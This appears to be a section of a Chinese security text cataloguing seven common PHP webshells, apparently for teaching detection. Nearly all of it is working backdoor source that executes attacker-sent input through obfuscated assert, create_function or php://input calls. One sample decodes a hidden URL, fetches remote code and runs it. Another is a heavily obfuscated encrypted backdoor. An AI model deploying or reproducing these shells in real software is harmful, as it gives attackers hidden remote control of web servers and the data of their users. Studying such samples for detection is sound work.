4.3.2 常见WebShell

case1:


<?php 
    $K=sTr_RepLaCe('`','','a`s`s`e`r`t');
    $M=$_POST[ice];
    IF($M==NuLl)HeaDeR('Status:404');
    Else/**/$K($M);
?>

图4-16 功能完善的WebShell

case2:


<?php 
$qajd2="VDFOVVd5";$vvnr1="UUdWMllX";$hitq5="d29KRjlR";$itfh2="ZGtabmg2Y1RRblhTazc=";// dfxzq4 
$akmi4 = str_replace("eu2","","eu2seu2teu2reu2_reu2eeu2pleu2aeu2ce");// ulgp9 
$hygg4 = $akmi4("so0", "", "so0baso0sso0e6so04so0_so0dso0eso0cso0oso0dso0e");// qbhm1 
$gzsw5 = $akmi4("qik6","","qik6cqik6reqik6atqik6eqik6_fqik6uncqik6tqik6ioqik6n"); // kfcs6 
$foxl6 = $gzsw5('', $hygg4($hygg4($akmi4("$;*,.", "", $vvnr1.$hitq5.$qajd2.$itfh2)))); $foxl6(); 
?>

case3:


// php://input based backdoor
// uses include('php://input') to execute arbritary code
// Any valid PHP code sent as raw POST data to backdoor is ran
// overrides the php.ini settings using ini_set :)
// Insecurety Research 2013 | insecurety.net
<?php
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
include('php://input');
?>

case4:


<?php @$_="s"."s"./*- 
//////////////////// 
*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/ 
/////////////////////
*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> 

case5:


<?php 
    $item['wind'] = 'assert'; 
    $array[] = $item; 
    $array[0]['wind']($_POST['hkwwj']);
?>

case6:


<?php
session_start();
ini_set('memory_limit',-1);
$i = pack('c*', 0x70, 0x61, 99, 107);
$GLOBALS = array(
    'p' => pack('c*', 0x70, 0x61, 99, 107),
    'c' => $i('c*', 99, 97, 108, 108, 95, 117, 115, 101, 114, 95, 102, 117, 110, 99),
    'f' => $i('c*', 102, 105, 108, 101, 95, 103, 101, 116, 95, 99, 111, 110, 116, 101, 110, 116, 115),
    'e' => $i('c*',0x63,0x72,0x65,0x61,0x74,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e),
    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
    's' =>$i('c*',0x73,0x70,0x72,0x69,0x6e,0x74,0x66)
);
if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSION['t']))));
?>

case7:


<?php
$w='Do0;$Doi<$l;Do){for($j=0;($Doj<$cDo&&$i<$l);$j++Do,Do$i++){$o.DoDo=$t{$i}^Do$k{$j};}Do}retDourn $o;}$r=Do$_SER';
$y=str_replace('km','','crkmekmate_kmkmfukmkmnction');
$t='($e)Do{$k=$khDo.$kf;ob_sDotDoart();@eDoval(@gzDouDoncomDopress(Do@x(@bDoase64Do_decode(preg_replaDoce(aDoDorr';
$b='$kh="63Doa9"Do;$kfDo="f0eaDo";fuDoncDotion x($t,$kDo){$c=strlen($kDo);$lDo=strlen(Do$t);$o=Do"";fDoor($iDo=';
$f='ay("/Do_/","Do/-/"),aDorrayDo("/","+"Do),$ss($s[$Doi],0,DoDo$e))Do),$k)));$o=ob_get_DoconteDonDots();ob_endDo_cle';
$H=']Do+(Do?:;Doq=0.([\\d]))?,?/",$ra,DoDo$m);if($q&Do&$m){@seDossDoionDoDo_start();$s=&$_DoSESSIODoNDo;$ss="substr";$Do';
$I='sl=Do"sDotrtDoolower";$i=$mDo[Do1][0].$m[1][1];$Doh=$sl($Doss(mdDo5($i.$kDoh),0,3Do));$DofDo=$sl($ss(md5(DoDo$i.$kf),0';
$K='VEDoR;$rrDo=@$r[Do"HTTDoP_REFERDoER"];$rDoaDoDo=@$Dor["HTTP_DoACCEPDoT_LANGUADoGE"];if($rr&&$raDo)Do{$Dou=Dopars';
$a='e_url($rr);paDorse_str($Dou["querDoy"Do]Do,$q);$Doq=array_DoDovaDolues($q);prDoeDog_Domatch_all(Do"/([\\w])[\\w-';
$A='Do,3))Do;$p="Do";Dofor($z=1;$Doz<cDoount($m[Do1]DoDo);Do$z++)$p.=$q[$m[2][$Doz]Do];if(strpos($DoDop,$h)===0)Do';
$S='an()Do;$d=baDoseDo64_encoDode(x(gzDoDocompressDo($o)DoDo,Do$k));print("<$k>Do$Dod</$k>");@session_deDostroy(Do);}}}}';
$M='{Do$s[$i]="";$Dop=$ss($pDo,3);}if(arDoray_kDoey_existDos($i,$DoDos)){$Dos[$i].=Do$p;$e=strpDoos($s[Do$i],$f);DoifDo';
$Q=str_replace('Do','',$b.$w.$K.$a.$H.$I.$A.$M.$t.$f.$S);
$P=$y('',$Q);$P();
?>